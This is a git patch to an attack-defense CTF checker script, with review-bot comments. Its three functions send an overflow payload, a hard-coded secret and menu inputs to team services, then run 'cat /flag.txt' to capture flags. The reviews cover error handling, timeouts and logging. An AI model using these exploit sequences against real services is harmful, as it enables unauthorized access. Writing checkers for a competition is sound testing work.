From ba893fc03060909228f9cdd70289892688137abb Mon Sep 17 00:00:00 2001
From: myitinos
Date: Sat, 2 Nov 2019 22:54:52 +0800
Subject: [PATCH] [FIX] enclose script inside try-catch
---
checker.py | 143 ++++++++++++++++++++++++++++++-----------------------
1 file changed, 82 insertions(+), 61 deletions(-)
diff --git a/checker.py b/checker.py
index 4c71976..c0caa55 100644
--- a/checker.py
+++ b/checker.py
@@ -15,74 +15,53 @@ FORMAT = "SlashRootCTF" def poc0(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">").decode('utf-8') - # print(msg) - if "young" in msg: - p.sendline("y") - p.recvuntil(">") - p.sendline("2") - p.recvuntil(">") - p.sendline("4") + try: + with remote(host, port) as p: p.recvuntil(">") - p.sendline("y") - for _ in range(10): + p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) + msg = p.recvuntil(">").decode('utf-8') + # print(msg) + if "young" in msg: + p.sendline("y") p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}").decode('utf-8') - # print flag - if FORMAT in flag: - return True + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in range(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}").decode('utf-8') + # print flag + if FORMAT in flag: + return flag[-46:] + else: + return False else: return False - else: - return False + except EOFError: + return False def poc1(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline("Leo") - p.recvuntil(">") - p.sendline("y") - for _ in range(2): + try: + with remote(host, port) as p: p.recvuntil(">") - p.sendline("3") + p.sendline("Leo") p.recvuntil(">") - p.sendline("0") - if "Who" in p.recvuntil(">").decode('utf-8'): - return False p.sendline("y") - p.recvuntil(">") - p.sendline("1") - p.recvuntil(">") - p.sendline("4") - p.recvuntil(">") - p.sendline("y") - for _ in range(10): - p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}").decode('utf-8') - if FORMAT in flag: - return True - else: - return False - - -def poc2(host, port): - with remote(host, port) as p: - p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") - p.recvuntil(">") - p.sendline("y") - p.recvuntil(">") - 
p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): - p.sendline("2") + for _ in range(2): + p.recvuntil(">") + p.sendline("3") + p.recvuntil(">") + p.sendline("0") + if "Who" in p.recvuntil(">").decode('utf-8'): + return False + p.sendline("y") + p.recvuntil(">") + p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") @@ -93,11 +72,41 @@ def poc2(host, port): p.sendline("cat /flag.txt") flag = p.recvuntil("}").decode('utf-8') if FORMAT in flag: - return True + return flag[-46:] + else: + return False + except EOFError: + return False + + +def poc2(host, port): + try: + with remote(host, port) as p: + p.recvuntil(">") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") + p.recvuntil(">") + p.sendline("y") + p.recvuntil(">") + p.sendline("6") + if "Lv: 1000000" in p.recvuntil(">").decode('utf-8'): + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in range(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}").decode('utf-8') + if FORMAT in flag: + return flag[-46:] + else: + return False else: return False - else: - return False + except EOFError: + return False def poc(host, port): @@ -120,6 +129,9 @@ def check(team): r0 = poc0(HOST, port) r1 = poc1(HOST, port) r2 = poc2(HOST, port) + # r0 = False + # r1 = False + # r2 = False return "Team [{:02d}] {} {} {} {}".format(team, r, r0, r1, r2) 
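Review bot: The new `except EOFError:` in poc0 (and the identical handlers added to poc1 in this hunk and poc2 in the next) only covers a peer that closes the connection. A connection failure raised by `remote(...)`, or a `UnicodeDecodeError` from `.decode('utf-8')` on the bytes returned after the raw-byte payload, still propagates, and as far as the visible `p.map(check, ...)` loop shows, one such exception ends the round for every team. Widen the handler, e.g. `except (EOFError, OSError, UnicodeDecodeError): return False`, adding whatever class the `remote` implementation raises on connect failure (its import is outside the hunk). The `recvuntil(">")` calls also carry no timeout, so a service that stays connected but never prints the prompt blocks its worker indefinitely; if `remote` is the pwntools tube, `recvuntil(">", timeout=...)` bounds that.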
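Review bot: `return flag[-46:]` in poc1 and poc2 (and in poc0 in the previous hunk) hard-codes the flag length, so a flag of any other length comes back either truncated or preceded by leftover prompt output. Since the branch has already checked `FORMAT in flag`, anchoring on the prefix is safer: `return flag[flag.rindex(FORMAT):]`. The returned text is then interpolated into the `check` result string and written by `checker_logger.info(result)`, so captured flags end up in the checker log in clear text. Confirm that the log's access controls allow for that, or log only a success marker and keep the flag value out of the log.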
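Review bot: The three commented-out assignments `# r0 = False`, `# r1 = False`, `# r2 = False` added to `check` are leftover debugging switches and should not be committed; the same goes for the `# print(...)` lines kept elsewhere in the patch. If running the checker without the exploit probes is a wanted mode, make it explicit with a named constant (a suggested new name), e.g. `r0 = poc0(HOST, port) if RUN_EXPLOITS else False`. `check` begins outside this hunk.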
@@ -148,6 +160,15 @@ if __name__ == "__main__": while True: with Pool(TOTAL_TEAMS) as p: results = p.map(check, range(1, TOTAL_TEAMS+1)) + r0 = r1 = r2 = r3 = 0 for result in results: checker_logger.info(result) + status = result.split(' ')[2:] + # print(status) + r0 = (r0 + 1) if status[0] != "False" else (r0) + r1 = (r1 + 1) if status[1] != "False" else (r1) + r2 = (r2 + 1) if status[2] != "False" else (r2) + r3 = (r3 + 1) if status[3] != "False" else (r3) + checker_logger.info( + "Summary: {} working as expected, 1st vuln {}, 2nd vuln {}, 3rd vuln {}".format(r0, r1, r2, r3)) sleep(INTERVAL)
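Review bot: `status = result.split(' ')[2:]` recovers the four results by re-parsing the log string, which shifts the indices and miscounts as soon as any field contains a space. The exploit fields are now `flag[-46:]` slices of service output, which can include spaces or newlines when the flag is shorter than 46 characters. Have `check` return the values and format them only when logging, e.g. `return team, r, r0, r1, r2`, then test each value directly instead of comparing against the string `"False"` (what `poc` returns for `r` is not visible here). The counter names are also shifted relative to `check`: here `r0` counts the functional check `r` and `r1`–`r3` count poc0–poc2, so names such as `ok, v1, v2, v3` would read unambiguously. The `while True:` loop starts outside the hunk.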